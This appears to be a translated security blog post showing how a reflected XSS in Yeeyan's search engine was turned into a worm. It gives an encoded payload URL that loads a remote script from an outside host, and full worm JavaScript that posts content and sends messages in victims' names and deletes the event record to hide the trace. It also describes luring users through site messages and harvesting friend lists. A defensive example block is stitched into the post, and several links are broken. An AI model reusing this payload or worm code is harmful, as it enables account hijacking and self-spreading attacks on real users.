Yeeyan is a web 2.0 site that "discovers, translates and reads the essence of the non-Chinese Internet". Its filtering is aggressive, but the search engine has an XSS, and the search filter is aggressive in its own way: it escapes single and double quotes, and it returns no results when the search value contains an ASCII colon. So I could only construct the payload like this:
/main/ysearch?q=%3Cs%63%72ipt%3Eeval(%53%%72om%43%68ar%43ode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,48,120,51,55,46,99,111,109,47,121,121,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41))%3C/s%63%72ipt%3E
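As an added example (not the post's own code), the following JavaScript models the filter described above, escaping quotes and rejecting colons, beside the HTML entity encoding that would actually have neutralised the reflected query; `weakFilter`, `htmlEncode` and `decodeCharCodes` are names chosen here, and the sample query is constructed from the payload above.

```javascript
// Character codes copied from the payload above; they carry the quotes and the
// colon that the site's filter was looking for, so the filter never sees them.
const CODES = [100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,39,60,115,99,
  114,105,112,116,32,115,114,99,61,104,116,116,112,58,47,47,119,119,119,46,48,120,51,
  55,46,99,111,109,47,121,121,46,106,115,62,60,47,115,99,114,105,112,116,62,39,41];

// The trap as the server sees it after URL-decoding (constructed from the page).
const trapQuery = `<script>eval(String.fromCharCode(${CODES.join(",")}))</script>`;

// Model of the filter the post describes: refuse colons, escape quotes, nothing else.
function weakFilter(q) {
  if (q.includes(":")) return null;             // "does not return the search results"
  return q.replace(/["']/g, m => "\\" + m);     // quotes escaped, angle brackets untouched
}

// The fix for a value reflected into an HTML text context: encode every
// character that can change the HTML structure, not just the quotes.
function htmlEncode(q) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return q.replace(/[&<>"']/g, c => map[c]);
}

// Analyst helper: recover the plaintext a String.fromCharCode(...) payload evaluates to.
function decodeCharCodes(payload) {
  const m = payload.match(/fromCharCode\(([\d,\s]+)\)/);
  return m ? String.fromCharCode(...m[1].split(",").map(Number)) : null;
}

// Crude check used below to show which treatment still leaves an executable tag.
function containsScriptTag(s) {
  return /<script/i.test(s);
}
```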
A search-engine XSS is normally nothing interesting, but in Yeeyan's case this easily overlooked point can be used to build an XSS worm. The following problems must be solved before the worm can be born:
Q1. How does the search-engine XSS trap above load the remote worm?
A1. Because the worm is large, it cannot fit into this XSS trap all at once (unlike a miniature XSS worm that copies itself), so we need a way to use the trap to call a remote worm. There are many methods; you will know mine if you decode the trap :)
Q2. How do we get other authenticated users to visit this search-engine XSS trap?
A2. First send an on-site message to some users (the worm itself can send them in batches :)) to trick them into visiting. Once they visit, the trap calls the remote worm, and the worm collects their friend lists, mailbox information and so on, which in turn contain other users' information. So the trap can spread widely through the site's messaging system.
Q3. How does the worm obtain the identity of the user who visits the search-engine XSS trap?
A3. This is very important. The worm needs many hosts to spread, and to obtain those hosts you must be able to reliably obtain specific user identity information, such as the user's ID and the address of their space (profile page). Once the worm spreads, it is explosive :)
Having solved all these problems, Yeeyan's search-engine XSS worm was born. The worm code is as follows:
var _x=false;
// Create the XMLHttpRequest object. The feature-test conditions and the ActiveX
// ProgIDs were lost in extraction and are restored here as the standard idiom.
if(window.XMLHttpRequest){
_x=new XMLHttpRequest();
}else if(window.ActiveXObject){
_x=new ActiveXObject("Msxml2.XMLHTTP");
if(!_x){_x=new ActiveXObject("Microsoft.XMLHTTP");}
}
_1();
// Step 1: read the visiting user's own profile page to learn their identifier,
// then post a group topic in their name.
function _1(){
var _u=_3or7("GET","/space/showme",null);
// The profile page links to /space/groups/<user>; capture <user> as the identifier.
var re=/\<a href=\"\/space\/groups\/(.*?)\">/i;
var r=_u.match(re);
var src="/groups/newTopic/";
var _txt="HELLO YEEYAN.";
// Hand-built multipart/form-data body; the boundary matches the header set in _3or7.
var argv_1="\r\n";
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[Post][content]\"\r\n\r\n";
argv_1+=(_txt+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"ymsggroup\"\r\n\r\n";
argv_1+=(""+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"ymsgee\"\r\n\r\n";
argv_1+=(r[1]+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"ymsgee_username\"\r\n\r\n";
argv_1+=(r[1]+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5--\r\n";
_3or7("POST",src,argv_1);
// Delete the event record that the post generated.
var _del=_3or7("GET","/space/deleteEvent/15429",null);
//Delete the record just like this :)
_2();
}
// Step 2: send an on-site message (the spreading vector described in A2).
function _2(){
var src="/space/compose_message";
var _to="Yasmin";
var _s="yeeyan";
var _m="HELLO:)";
var argv_1="\r\n";
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[receiver_name]\"\r\n\r\n";
argv_1+=(_to+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[subject]\"\r\n\r\n";
argv_1+=(_s+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[message][content]\"\r\n\r\n";
argv_1+=(_m+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[message_id]\"\r\n\r\n";
argv_1+=(""+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"data[action]\"\r\n\r\n";
argv_1+=("send"+"\r\n");
argv_1+="---------------------7964f8dddeb95fc5--\r\n";
_3or7("POST",src,argv_1);
alert(0);
}
// Synchronous XHR helper: _m is the HTTP method, _s the URL, _a the body (null for GET).
function _3or7(_m,_s,_a){
_x.open(_m,_s,false);
if(_m=="POST")_x.setRequestHeader("Content-Type","multipart/form-data; boundary=-------------------7964f8dddeb95fc5");
_x.send(_a);
return _x.responseText;
}

To understand this code, refer to my previous article; here is a clue: http:///post/. My purpose in writing this worm was to verify the method described in this article: http:///post/. I can only say that the foreigner was a little irresponsible :), and I had to recode it. The method works in theory, but I am currently having some trouble. It is better to construct the HTTP headers yourself; POSTing the worm's data works fine. This is the first time I have borrowed a search engine to build a worm. As long as the XSS trap and the target attack point are satisfied, it will be OK.